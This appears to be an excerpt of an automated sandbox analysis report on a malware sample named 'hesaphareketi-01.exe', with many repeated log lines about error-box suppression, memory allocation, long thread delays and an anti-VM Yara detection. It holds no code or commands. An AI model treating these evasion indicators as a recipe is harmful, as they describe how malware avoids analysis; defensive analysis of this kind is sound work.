Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: hesaphareketi-01.exe PID: 5860, type: MEMORYSTR

Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Memory allocated: 1330000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Memory allocated: 2E90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Memory allocated: 1370000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Memory allocated: 7D00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Memory allocated: 8D00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Memory allocated: 8EB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Memory allocated: 9EB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Memory allocated: A210000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Memory allocated: B210000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Memory allocated: 1190000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Memory allocated: 2D20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Memory allocated: 2B30000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 599859	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 599750	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 599531	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 599312	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 599203	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 598766	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 598547	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 598437	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 597891	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 597672	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 597453	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 597344	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 597234	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 597125	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 597016	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 596906	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 596797	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 596687	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 596578	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 596468	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 596359	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 596250	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 596135	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 596031	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 595910	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 595781	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 595672	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 595547	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 595437	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 595328	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 595219	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 595094	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 594984	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 594875	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 594766	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 594656	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 594547	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6286	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3443	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Window / User API: threadDelayed 7666	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Window / User API: threadDelayed 2191	Jump to behavior

Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 2528	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6772	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600	Thread sleep time: -25825441703193356s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600	Thread sleep time: -599859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4700	Thread sleep count: 7666 > 30	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4700	Thread sleep count: 2191 > 30	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600	Thread sleep time: -599750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600	Thread sleep time: -599641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600	Thread sleep time: -599531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600	Thread sleep time: -599422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600	Thread sleep time: -599312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600	Thread sleep time: -599203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600	Thread sleep time: -599094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600	Thread sleep time: -598984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600	Thread sleep time: -598875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600	Thread sleep time: -598766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600	Thread sleep time: -598656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600	Thread sleep time: -598547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600	Thread sleep time: -598437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600	Thread sleep time: -598328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600	Thread sleep time: -598219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600	Thread sleep time: -598109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600	Thread sleep time: -598000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600	Thread sleep time: -597891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600	Thread sleep time: -597781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600	Thread sleep time: -597672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600	Thread sleep time: -597562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600	Thread sleep time: -597453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600	Thread sleep time: -597344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600	Thread sleep time: -597234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600	Thread sleep time: -597125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600	Thread sleep time: -597016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600	Thread sleep time: -596906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600	Thread sleep time: -596797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600	Thread sleep time: -596687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600	Thread sleep time: -596578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600	Thread sleep time: -596468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600	Thread sleep time: -596359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600	Thread sleep time: -596250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600	Thread sleep time: -596135s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600	Thread sleep time: -596031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600	Thread sleep time: -595910s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600	Thread sleep time: -595781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600	Thread sleep time: -595672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600	Thread sleep time: -595547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600	Thread sleep time: -595437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600	Thread sleep time: -595328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600	Thread sleep time: -595219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600	Thread sleep time: -595094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600	Thread sleep time: -594984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600	Thread sleep time: -594875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600	Thread sleep time: -594766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600	Thread sleep time: -594656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 4600	Thread sleep time: -594547s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 599859	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 599750	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 599531	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 599312	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 599203	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 598766	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 598547	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 598437	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 597891	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 597672	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 597453	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 597344	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 597234	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 597125	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 597016	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 596906	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 596797	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 596687	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 596578	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 596468	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 596359	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 596250	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 596135	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 596031	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 595910	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 595781	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 595672	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 595547	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 595437	Jump to behavior
